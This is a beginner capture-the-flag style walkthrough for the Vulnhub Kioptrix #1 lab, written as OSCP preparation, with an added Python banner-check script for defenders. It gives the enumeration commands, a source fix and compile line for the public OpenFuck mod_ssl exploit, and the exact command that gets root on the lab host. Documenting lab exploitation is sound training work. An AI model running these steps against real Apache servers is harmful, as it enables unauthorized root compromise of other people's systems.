Vulnhub link: kioptrix #1
I attempted (and succeeded) to root this box as part of my preparations for the OSCP exam. This was a very easy box to own (it is rated 'beginner' for a reason).
First, run netdiscover to find the target host on the local network:
In this case, our target is located at 192.168.174.129. Let’s run a standard nmap scan against it.
nmap -sS -sV -T4 -A -O -v -v -v -v 192.168.174.129
There is nothing of interest on the web server itself, which is running on ports 80 and 443. Running dirb against it reveals the directory /manual/ on the server. Navigating there shows two manuals for Apache modules, one of which is mod_ssl. Navigating to /manual/mod/mod_ssl/ reveals that the installed version of mod_ssl is 2.8.
Searching exploit-db for Apache 1.3.20, we find a remote buffer overflow vulnerability affecting mod_ssl that allows arbitrary code execution. Bingo.
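As an added example (not part of the original writeup), the following Python flags the Apache 1.3 / mod_ssl 2.8 combination identified above from an HTTP Server banner, the kind of check a defender would run over an asset inventory. The sample banners are constructed, and the match criteria are deliberately limited to the versions this writeup names rather than a complete vulnerability database.

```python
import re
from typing import Dict, List, Tuple

# Matches "product/version" tokens in an HTTP Server header, e.g. "mod_ssl/2.8.4".
# The version must start with a digit, so "(Red-Hat/Linux)" is not picked up as a product.
TOKEN_RE = re.compile(r"([A-Za-z_-]+)/(\d+(?:\.\d+)*[A-Za-z]?)")


def parse_server_header(header: str) -> Dict[str, Tuple[int, ...]]:
    """Map each product in a Server header (lower-cased) to its numeric version tuple."""
    versions: Dict[str, Tuple[int, ...]] = {}
    for product, version in TOKEN_RE.findall(header):
        nums = tuple(int(p) for p in re.findall(r"\d+", version))
        versions[product.lower()] = nums
    return versions


def assess_banner(header: str) -> List[str]:
    """Return findings for the Apache/mod_ssl combination this writeup targets.

    Assumption: the criteria (Apache 1.3 with mod_ssl 2.8) come from the writeup
    above; they are a triage heuristic, not an exhaustive vulnerability check.
    """
    v = parse_server_header(header)
    apache = v.get("apache")
    modssl = v.get("mod_ssl")
    findings: List[str] = []
    if apache and apache[:2] == (1, 3):
        findings.append(f"Apache {'.'.join(map(str, apache))}: the 1.3 branch is end-of-life")
    if modssl and modssl[:2] == (2, 8):
        findings.append(f"mod_ssl {'.'.join(map(str, modssl))}: version exploited in this writeup")
    if apache and modssl and apache[:2] == (1, 3) and modssl[:2] == (2, 8):
        findings.append("HIGH: Apache 1.3 + mod_ssl 2.8; patch or isolate the host and review SSL access logs")
    return findings


# Constructed sample banners: one in the form an old mod_ssl-enabled Apache 1.3 host
# reports, one from a current, patched server.
SAMPLE_BANNER = "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"
SAMPLE_PATCHED = "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13"

if __name__ == "__main__":
    for banner in (SAMPLE_BANNER, SAMPLE_PATCHED):
        print(banner, "->", assess_banner(banner) or ["no findings"])
```

Note that hiding the banner with Apache's ServerTokens directive is not enough on its own: the exposed /manual/ directory leaks the same version, which is exactly how this writeup identifies it.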
Download an exploit for this vulnerability called OpenFuck from GitHub. Depending on whether it has been updated since the time of this post, you will have to make one small modification to the source code. In its current state, there is a typo on line 1087 of OpenFuck.c (a broken if statement). Change it so that it matches the following:
if (encrypted_key_length <= 0) {
    printf("send client master key: RSA encryption failure\n");
    exit(1);
}
You should now be able to successfully compile the exploit using gcc (make sure to link it with the crypto library using the -lcrypto option).
gcc -o OpenFuck OpenFuck.c -lcrypto
Running ./OpenFuck with no arguments outputs a massive list of OS fingerprints. The two we are interested in are 0x6a and 0x6b, for RedHat Linux 7.2 (apache-1.3.20-16) 1 and 2. We pass this value to OpenFuck so it knows which memory offset to use.
./OpenFuck 0x6b 192.168.174.129 443 -c 40
After a few seconds, we should have root access to the box.